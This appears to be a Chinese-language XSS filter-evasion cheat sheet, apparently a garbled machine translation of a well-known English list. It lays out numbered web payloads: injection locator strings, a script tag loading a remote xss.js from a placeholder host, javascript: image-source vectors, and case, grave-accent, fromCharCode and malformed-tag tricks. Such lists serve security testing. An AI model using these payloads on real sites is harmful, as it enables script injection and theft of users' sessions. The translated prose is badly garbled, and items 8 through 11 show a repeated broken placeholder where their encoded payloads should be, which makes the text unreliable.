xss攻击代码

1.XSS定位器。注射这根弦,而且在大多数情况下,脚本是脆弱的,没有特殊要求XSS向量单词“XSS”会流行起来。使用计算器下面网址(URL)编码的编码整个字符串。提示:如果你在垫子,需要快速检查一页,多次注射贬值" <PLAINTEX>“标签就足以去看看一些易受XSS的输出略微把房间弄得乱七八糟。
 

 实例：';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

2.SSS定位器2。如果你没有多少空间和知没有脆弱的JavaScript页面上,该字符串是一个很好的紧凑XSS注射检查。查看源注入后它,并且寻找&lt XSS诗句,< XSS看看它是脆弱的
 

代码：'';!--"<XSS>=&{()}

3.没有滤镜�避。这是一个正常的XSS JavaScript注射,最容易被逮住了,但我建议尝试它第一次(引号不需要在任何现代浏览器,所以他们被忽略了这里)

代码：<SCRIPT SRC=www.xxx.xom/xss.js></SCRIPT>

4.使用图像XSS JavaScript指令(IE7.0不支持JavaScript指令在上下文的一个形象,但它在其他场合,但下列显示原理工作,这将在其他标签——我可能会修改本在以后的日子里)
  代码：1）<IMG SRC=\'#\'" /p>

              2）<IMG SRC=javascript:alert('XSS')>

             3）<IMG SRC=JaVaScRiPt:alert('XSS')>

             4）<IMG SRC=javascript:alert(&quot;XSS&quot;)>

5.口音含糊不清的坟墓(如果你需要同时使用单引号增加了一倍,你可以使用一个坟墓的口音来封装JavaScript字符串-这也是有用的,因为很多跨站脚本过滤器不知道严重口音)

代码：<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

6.畸形图片标签。Begeek最初发现(但清理干净,缩短工作在所有的浏览器),该XSS向量采用轻松渲染器来创造我们XSS向量在一个图片标签应封装在引号。我猜这是原来的意思是到正确的邋遢的代码。这将使它更明显的很难正确地解析HTML标签

 代码：<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

7.fromCharCode(如果没有任何类型的引用允许():你可以在fromCharCode JavaScript创造任何XSS向量你需要)

代码：<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

8.utf - 8的字符编码标准编码的例子,使用javascript XSS指令里面的一个<图片标签并不会在火狐或n etscape4 . +在壁虎渲染器模式)。使用XSS计算器,以获取更多信息
代码：<IMGSRC=\'#\'" /p>

<IMGSRC=\'#\'" /p>

9.无分号(十六进制编码这也是一个可行的XSS攻击上述字符串$tmp_string= ~ s /。* \ & #(\ d +);。* / 1$/,假设有一个数字字符以下英镑符号-这是不符合事实的利用六角HTML字符)。使用XSS计算器,以获取更多信息
 代码：<IMGSRC=\'#\'" /p>

10.嵌入式标签打破了跨站脚本攻击

代码：<IMG SRC=\'#\'" /p>

11.嵌入式编码标签分手XSS

代码：<IMG SRC=\'#\'" /p>